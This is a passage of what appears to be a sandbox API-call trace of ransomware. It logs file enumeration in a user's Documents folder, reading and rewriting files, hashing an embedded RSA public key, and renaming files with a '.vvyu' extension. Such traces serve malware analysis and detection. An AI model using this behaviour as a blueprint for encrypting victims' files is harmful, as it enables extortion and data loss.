hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.624] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x61ab, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x61ab, lpOverlapped=0x0) returned 1 [0192.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.624] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x61b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.624] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.626] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.627] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.627] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.627] CloseHandle (hObject=0x584) returned 1 [0192.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0192.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0192.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0192.629] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\wzwkC7.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\wzwkc7.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\wzwkC7.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\wzwkc7.odp.vvyu")) returned 1 [0192.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.630] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.632] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e1c3500, ftCreationTime.dwHighDateTime=0x1d89d99, ftLastAccessTime.dwLowDateTime=0x8dc8a650, ftLastAccessTime.dwHighDateTime=0x1d8a727, ftLastWriteTime.dwLowDateTime=0x8dc8a650, ftLastWriteTime.dwHighDateTime=0x1d8a727, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yEpRZCn46rxjDOAUpD", cAlternateFileName="YEPRZC~1")) returned 1 [0192.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea9a8 [0192.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0192.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea9a8 | out: hHeap=0x6a0000) returned 1 [0192.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.633] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59042aa0, ftCreationTime.dwHighDateTime=0x1d89923, ftLastAccessTime.dwLowDateTime=0xab78d9c0, ftLastAccessTime.dwHighDateTime=0x1d89e3c, ftLastWriteTime.dwLowDateTime=0xab78d9c0, ftLastWriteTime.dwHighDateTime=0x1d89e3c, nFileSizeHigh=0x0, nFileSizeLow=0x15e9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z8rQUb38uy_iJ3tNKmP2.ppt", cAlternateFileName="Z8RQUB~1.PPT")) returned 1 [0192.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0192.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.633] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\Z8rQUb38uy_iJ3tNKmP2.ppt") returned=".ppt" [0192.633] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\Z8rQUb38uy_iJ3tNKmP2.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\z8rqub38uy_ij3tnkmp2.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.634] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=89757) returned 1 [0192.634] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.637] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15e77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.637] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.640] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.640] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x15e9d, lpOverlapped=0x0) returned 1 [0192.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.641] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0192.642] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.642] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.642] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.642] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.642] GetLastError () returned 0x0 [0192.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.643] GetLastError () returned 0x0 [0192.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.643] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.643] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0192.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.644] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.644] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.644] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15ea0) returned 0x2d45778 [0192.645] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41bf0 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41c38 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.646] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39da8 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d90 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.649] GetCurrentThreadId () returned 0x264 [0192.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d453b0 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.650] GetCurrentThreadId () returned 0x264 [0192.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39da8 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e08 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e20 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dc0 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d90 [0192.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 